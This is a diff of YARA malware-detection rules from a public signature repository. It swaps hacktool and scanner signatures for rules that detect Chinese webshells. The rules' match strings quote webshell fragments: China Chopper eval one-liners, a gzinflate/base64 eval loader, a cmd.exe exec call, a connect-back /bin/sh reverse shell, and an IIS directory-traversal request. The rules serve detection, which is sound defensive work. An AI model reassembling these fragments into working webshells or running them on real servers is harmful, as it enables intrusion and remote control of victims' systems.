-		logic_hash = "a42bfaefb873a10821bcc06db109d8ab20daa8c8ac0b6cfb245d2ee339f318bb"
-		score = 60
+		hash = "f39c2f64abe5e86d8d36dbb7b1921c7eab63bec9"
+		logic_hash = "37d6bc61d790ff30c98ded08ff875431fda525cd3ac10b4b1ba3f8f42167ed8c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"
+		$s0 = "<%@LANGUAGE=\"VBScript.Encode\" CODEPAGE=\"936\"%>" fullword ascii
+		$s5 = ".black {" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x253c and filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_Sqlmap
+rule SIGNATURE_BASE_Chinachopper_Temp : FILE
 {
 	meta:
-		description = "This signature detects the SQLMap SQL injection tool"
+		description = "Chinese Hacktool Set - file temp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "55a72fe6-f82d-5d55-842f-5d7e1cfcc9fa"
-		date = "2014-01-07"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L151-L163"
+		id = "f163787f-fcc9-568a-a12d-4057cb4f0d29"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L309-L325"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9c248c856c3d91a282012489b53dc9e15569e1bb1a5c9f5e3c7938f7ce0c3157"
-		score = 60
+		hash = "b0561ea52331c794977d69704345717b4eb0a2a7"
+		logic_hash = "3669dfa10867970456f6638035a87d448e2b728387fbd07b59ffd981a1ab6200"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "except SqlmapBaseException, ex:"
+		$s0 = "o.run \"ff\",Server,Response,Request,Application,Session,Error" fullword ascii
+		$s1 = "Set o = Server.CreateObject(\"ScriptControl\")" fullword ascii
+		$s2 = "o.language = \"vbscript\"" fullword ascii
+		$s3 = "o.addcode(Request(\"SC\"))" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Portscanner_Simple_Jan14
+rule SIGNATURE_BASE_Tools_2015 : FILE
 {
 	meta:
-		description = "Auto-generated rule on file PortScanner.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "3e8960ce-0428-51e1-b992-4fa09fee8520"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		old_rule_name = "PortScanner"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L165-L177"
+		description = "Chinese Hacktool Set - file 2015.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eb2826ab-ef8d-5a93-9ede-f5bbd7ab4ff4"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L327-L344"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b381b9212282c0c650cb4b0323436c63"
-		logic_hash = "c69269b227d46b5b970cfc094b3154b0a533b439b8ed492a2059025bc96d17a0"
+		hash = "8fc67359567b78cadf5d5c91a623de1c1d2ab689"
+		logic_hash = "2b93ef42c277fd8415cf89bf1bef3e841c56a2b4aa1507d99b84cd8adc9a0644"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Scan Ports Every"
-		$s3 = "Scan All Possible Ports!"
+		$s0 = "Configbis = new BufferedInputStream(httpUrl.getInputStream());" fullword ascii
+		$s4 = "System.out.println(Oute.toString());" fullword ascii
+		$s5 = "String ConfigFile = Outpath + \"/\" + request.getParameter(\"ConFile\");" fullword ascii
+		$s8 = "HttpURLConnection httpUrl = null;" fullword ascii
+		$s19 = "Configbos = new BufferedOutputStream(new FileOutputStream(Outf));;" fullword ascii
 
 	condition:
-		all of them
+		filesize < 7KB and all of them
 }
-rule SIGNATURE_BASE_Domainscanv1_0
+rule SIGNATURE_BASE_Chinachopper_Temp_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule on file DomainScanV1_0.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "94ead827-8b29-5cb5-82b6-a7ca5087bf7e"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L179-L196"
+		description = "Chinese Hacktool Set - file temp.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3952ed2b-fb27-5c45-9cd7-b7a300b37c0e"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L346-L359"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"
-		logic_hash = "b06d902528fee5d1718d0a2984af3314e92e1ec7033c7596f9fb0e51a20eb848"
+		hash = "604a4c07161ce1cd54aed5566e5720161b59deee"
+		logic_hash = "1b6d840797afcdbf7c72836557dbd486780c760471e79133810346c301cca80b"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "dIJMuX$aO-EV"
-		$s1 = "XELUxP\"-\\"
-		$s2 = "KaR\"U'}-M,."
-		$s3 = "V.)\\ZDxpLSav"
-		$s4 = "Decompress error"
-		$s5 = "Can't load library"
-		$s6 = "Can't load function"
-		$s7 = "com0tl32:.d"
+		$s0 = "@eval($_POST[strtoupper(md5(gmdate(" ascii
 
 	condition:
-		all of them
+		filesize < 150 and all of them
 }
-rule SIGNATURE_BASE_HKTL_Moorer_Port_Scanner
+rule SIGNATURE_BASE_Templatr : FILE
 {
 	meta:
-		description = "Auto-generated rule on file MooreR Port Scanner.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "5d8fb83f-bed3-53d2-bd33-2158911dc7c8"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L198-L211"
+		description = "Chinese Hacktool Set - file templatr.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b361a49d-1e05-5597-bf8b-735e04397ffa"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L361-L374"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "376304acdd0b0251c8b19fea20bb6f5b"
-		logic_hash = "248f437964fc6f7836f6b4c87e1f35bb1bac25a1a484cdf1a4065e7efb823b51"
+		hash = "759df470103d36a12c7d8cf4883b0c58fe98156b"
+		logic_hash = "80d207ee47c0c602ddd281e0e187b83cdb4f1385f4b46ad2a4f5630b8f9e96a1"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Description|"
-		$s3 = "soft Visual Studio\\VB9yp"
-		$s4 = "adj_fptan?4"
-		$s7 = "DOWS\\SyMem32\\/o"
+		$s0 = "eval(gzinflate(base64_decode('" ascii
 
 	condition:
-		all of them
+		filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_Netbios_Name_Scanner
+rule SIGNATURE_BASE_Reduhservers_Reduh_3 : FILE
 {
 	meta:
-		description = "Auto-generated rule on file NetBIOS Name Scanner.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "03716e00-a969-5ab5-9be7-e8fc4272e40f"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L213-L225"
+		description = "Chinese Hacktool Set - file reDuh.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "69f5fd6b-a9b3-500b-8723-d1c82494903d"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L376-L392"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "888ba1d391e14c0a9c829f5a1964ca2c"
-		logic_hash = "19b40a283b74317fece2f5be0ee3e38227d9631eebbc7efb0ea19056b52630f1"
+		hash = "0744f64c24bf4c0bef54651f7c88a63e452b3b2d"
+		logic_hash = "5a3bc023e0e8a5ccc8ee8e1b5e7ee0fca64e3f92b72d0aad15b25c82a23da487"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "IconEx"
-		$s2 = "soft Visual Stu"
-		$s4 = "NBTScanner!y&"
+		$s1 = "Response.Write(\"[Error]Unable to connect to reDuh.jsp main process on port \" +" ascii
+		$s2 = "host = System.Net.Dns.Resolve(\"127.0.0.1\");" fullword ascii
+		$s3 = "rw.WriteLine(\"[newData]\" + targetHost + \":\" + targetPort + \":\" + socketNum" ascii
+		$s4 = "Response.Write(\"Error: Bad port or host or socketnumber for creating new socket" ascii
 
 	condition:
-		all of them
+		filesize < 40KB and all of them
 }
-rule SIGNATURE_BASE_Felikspack3___Scanners_Ipscan
+rule SIGNATURE_BASE_Chinachopper_Temp_3 : FILE
 {
 	meta:
-		description = "Auto-generated rule on file ipscan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "8360b268-3434-5142-9248-40b7a1589be9"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L227-L239"
+		description = "Chinese Hacktool Set - file temp.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "573e7da6-f58f-5814-b3e8-a0db3ecfe558"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L394-L408"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6c1bcf0b1297689c8c4c12cc70996a75"
-		logic_hash = "8da10a4536ecea889f29bb3f098518580629bf48eda88db7adfc5f61738ede25"
+		hash = "c5ecb8bc1d7f0e716b06107b5bd275008acaf7b7"
+		logic_hash = "6a0d7817607362f325957e30cace24d32635b7e0411e161588ee573118f91b6a"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "WCAP;}ECTED"
-		$s4 = "NotSupported"
-		$s6 = "SCAN.VERSION{_"
+		$s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"" ascii
+		$s1 = "\"],\"unsafe\");%>" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x253c and filesize < 150 and all of them
 }
-rule SIGNATURE_BASE_Cgisscan_Cgiscan
+rule SIGNATURE_BASE_Shell_Asp : FILE
 {
 	meta:
-		description = "Auto-generated rule on file CGIScan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "60bd5038-a308-55fd-85bb-2c4183f1c951"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L241-L253"
+		description = "Chinese Hacktool Set Webshells - file Asp.html"
+		author = "Florian Roth (Nextron Systems)"
+		id = "52089205-8f36-5a0b-a1ae-67c91a253ad2"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L410-L425"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "338820e4e8e7c943074d5a5bc832458a"
-		logic_hash = "5bd856a77c53616cf78d093462f8b7ca5a5fb0924406a02941d86bdb015a1fbc"
+		hash = "5e0bc914ac287aa1418f6554ddbe0ce25f2b5f20"
+		logic_hash = "47c5c242713446471d5da4d9245b99561c26ad7fa016059076a6f0acab542c3c"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Wang Products" fullword wide
-		$s2 = "WSocketResolveHost: Cannot convert host address '%s'"
-		$s3 = "tcp is the only protocol supported thru socks server"
+		$s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
+		$s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
+		$s3 = "function Command(cmd, str){" fullword ascii
 
 	condition:
-		all of ( $s* )
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_IP_Stealing_Utilities
+rule SIGNATURE_BASE_Txt_Aspxtag : FILE
 {
 	meta:
-		description = "Auto-generated rule on file IP Stealing Utilities.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "3a947e9c-d707-5819-88f2-059585750048"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L255-L266"
+		description = "Chinese Hacktool Set - Webshells - file aspxtag.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L428-L443"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "65646e10fb15a2940a37c5ab9f59c7fc"
-		logic_hash = "38958edeee6e140e11267cdd7899ad517799dbce33ac267d51dea0f8aecfa1ee"
+		hash = "42cb272c02dbd49856816d903833d423d3759948"
+		logic_hash = "6ffeee18945cab96673e4b9efc143017d168be12b794fa26aa4a304f15ae8e13"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "DarkKnight"
-		$s9 = "IPStealerUtilities"
+		$s1 = "String wGetUrl=Request.QueryString[" fullword ascii
+		$s2 = "sw.Write(wget);" fullword ascii
+		$s3 = "Response.Write(\"Hi,Man 2015\"); " fullword ascii
 
 	condition:
-		all of them
+		filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_Superscan4
+rule SIGNATURE_BASE_Txt_Php : FILE
 {
 	meta:
-		description = "Auto-generated rule on file SuperScan4.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "bd353382-ffa2-56c5-b842-1ffc94d6849e"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L268-L281"
+		description = "Chinese Hacktool Set - Webshells - file php.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "65d5c46f-006d-58f9-bb7f-0a2e1f1853bd"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L445-L461"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "78f76428ede30e555044b83c47bc86f0"
-		logic_hash = "7f76c59e85efac5c150f783606e2a9bdc8724c6afd9f9c6405d63f7467c72752"
+		hash = "eaa1af4b898f44fc954b485d33ce1d92790858d0"
+		logic_hash = "ace26e7c0dca285febf6b9192cbe59cc7e55e80f2f4e1a99aba25afcbeadeec1"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = " td class=\"summO1\">"
-		$s6 = "REM'EBAqRISE"
-		$s7 = "CorExitProcess'msc#e"
+		$s1 = "$Config=$_SERVER['QUERY_STRING'];" fullword ascii
+		$s2 = "gzuncompress($_SESSION['api']),null);" ascii
+		$s3 = "sprintf('%s?%s',pack(\"H*\"," ascii
+		$s4 = "if(empty($_SESSION['api']))" fullword ascii
 
 	condition:
-		all of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Portracer
+rule SIGNATURE_BASE_Txt_Aspx1 : FILE
 {
 	meta:
-		description = "Auto-generated rule on file PortRacer.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "54717938-2f4c-5442-b0ad-40b9acd1101a"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L283-L295"
+		description = "Chinese Hacktool Set - Webshells - file aspx1.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L463-L477"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2834a872a0a8da5b1be5db65dfdef388"
-		logic_hash = "f6ad85a8970b10e25becca76e17bff30cbc787ed45f331af4ecf9563ff11b65d"
+		hash = "c5ecb8bc1d7f0e716b06107b5bd275008acaf7b7"
+		logic_hash = "20bdadd6c8b61ab14f6280f55a90f541bf65c33675f979ebe489cc3967438e15"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Auto Scroll BOTH Text Boxes"
-		$s4 = "Start/Stop Portscanning"
-		$s6 = "Auto Save LogFile by pressing STOP"
+		$s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item["
+		$s1 = "],\"unsafe\");%>" fullword ascii
 
 	condition:
-		all of them
+		filesize < 150 and all of them
 }
-rule SIGNATURE_BASE_Scanarator
+rule SIGNATURE_BASE_Txt_Shell : FILE
 {
 	meta:
-		description = "Auto-generated rule on file scanarator.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "dfc3ff29-03b4-58ca-bfe0-c6888fddab67"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L297-L307"
+		description = "Chinese Hacktool Set - Webshells - file shell.c"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3e4c5928-346e-541b-b1a8-b37d5e3abc98"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L479-L496"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "848bd5a518e0b6c05bd29aceb8536c46"
-		logic_hash = "9400435470c26245cd814e1e39f275eb22566d66d1a72d4f3e618a6ad11bc8d9"
+		hash = "8342b634636ef8b3235db0600a63cc0ce1c06b62"
+		logic_hash = "020e9e6ef776a9d69939fa3dec771dc516b0184086738bab439063acca89bd76"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
+		$s1 = "printf(\"Could not connect to remote shell!\\n\");" fullword ascii
+		$s2 = "printf(\"Usage: %s <reflect ip> <port>\\n\", prog);" fullword ascii
+		$s3 = "execl(shell,\"/bin/sh\",(char *)0);" fullword ascii
+		$s4 = "char shell[]=\"/bin/sh\";" fullword ascii
+		$s5 = "connect back door\\n\\n\");" fullword ascii
 
 	condition:
-		all of them
+		filesize < 2KB and 2 of them
 }
-rule SIGNATURE_BASE_Aolipsniffer
+rule SIGNATURE_BASE_Txt_Asp : FILE
 {
 	meta:
-		description = "Auto-generated rule on file aolipsniffer.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "f7cc0f31-6ba4-504b-82de-0334257b8a95"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L309-L327"
+		description = "Chinese Hacktool Set - Webshells - file asp.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "39a2ba9a-c429-574f-8820-5e0270a4b84c"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L498-L512"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "51565754ea43d2d57b712d9f0a3e62b8"
-		logic_hash = "e627b8ea85e4325714c98e93ad6147adfa600af548a80dce8548b7f5743733b5"
+		hash = "a63549f749f4d9d0861825764e042e299e06a705"
+		logic_hash = "9eab239310fbebe8c88cbf8d0ee4123b8f3e2ebe601949e1e984e9cfde9869e7"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB"
-		$s1 = "dwGetAddressForObject"
-		$s2 = "Color Transfer Settings"
-		$s3 = "FX Global Lighting Angle"
-		$s4 = "Version compatibility info"
-		$s5 = "New Windows Thumbnail"
-		$s6 = "Layer ID Generator Base"
-		$s7 = "Color Halftone Settings"
-		$s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca"
+		$s1 = "Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next:BodyCol" ascii
+		$s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x253c and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE__Bitchin_Threads_
+rule SIGNATURE_BASE_Txt_Asp1 : FILE
 {
 	meta:
-		description = "Auto-generated rule on file =Bitchin Threads=.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "3a51e76c-b360-5f10-961c-ecc3ea3fa3c9"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L329-L340"
+		description = "Chinese Hacktool Set - Webshells - file asp1.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b00ab02c-c767-568c-be99-6cc731c3f1dc"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L514-L530"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7491b138c1ee5a0d9d141fbfd1f0071b"
-		logic_hash = "f43fec37d9dc668b562838465e5696e502c638b207e7af6a77fac5a8b00e92a8"
+		hash = "95934d05f0884e09911ea9905c74690ace1ef653"
+		logic_hash = "77a4409b852d24228b0e1701f1ccc2abe3930c2c7240a43796b23042e706d9bf"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "DarKPaiN"
-		$s1 = "=BITCHIN THREADS"
+		$s1 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii
+		$s2 = "autoLoginEnable=WSHShell.RegRead(autoLoginPath & autoLoginEnableKey)" fullword ascii
+		$s3 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
+		$s4 = "szTempFile = server.mappath(\"cmd.txt\")" fullword ascii
 
 	condition:
-		all of them
+		filesize < 70KB and 2 of them
 }
-rule SIGNATURE_BASE_Cgis4_Cgis4
+rule SIGNATURE_BASE_Txt_Php_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule on file cgis4.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "98fbf445-b7a5-58fa-8f06-34be7321e2eb"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L342-L357"
+		description = "Chinese Hacktool Set - Webshells - file php.html"
+		author = "Florian Roth (Nextron Systems)"
+		id = "66916e32-9471-54bd-944e-bb751b38d3b0"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L532-L552"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d658dad1cd759d7f7d67da010e47ca23"
-		logic_hash = "2cf3fc6447323cbefe5f5ad02271eeb4c271bb9784d2c29030858542a43fbb04"
+		hash = "a7d5fcbd39071e0915c4ad914d31e00c7127bcfc"
+		logic_hash = "c08f62c3d468c2ebacd10fff6aa0c63bd303d627d487c070a9d22419bf6906cd"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = ")PuMB_syJ"
-		$s1 = "&,fARW>yR"
-		$s2 = "m3hm3t_rullaz"
-		$s3 = "7Projectc1"
-		$s4 = "Ten-GGl\""
-		$s5 = "/Moziqlxa"
+		$s1 = "function connect($dbhost, $dbuser, $dbpass, $dbname='') {" fullword ascii
+		$s2 = "scookie('loginpass', '', -86400 * 365);" fullword ascii
+		$s3 = "<title><?php echo $act.' - '.$_SERVER['HTTP_HOST'];?></title>" fullword ascii
+		$s4 = "Powered by <a title=\"Build 20130112\" href=\"http://www.4ngel.net\" target=\"_b" ascii
+		$s5 = "formhead(array('title'=>'Execute Command', 'onsubmit'=>'g(\\'shell\\',null,this." ascii
+		$s6 = "secparam('IP Configurate',execute('ipconfig -all'));" fullword ascii
+		$s7 = "secparam('Hosts', @file_get_contents('/etc/hosts'));" fullword ascii
+		$s8 = "p('<p><a href=\"http://w'.'ww.4'.'ng'.'el.net/php'.'sp'.'y/pl'.'ugin/\" target=" ascii
 
 	condition:
-		all of them
+		filesize < 100KB and 4 of them
 }
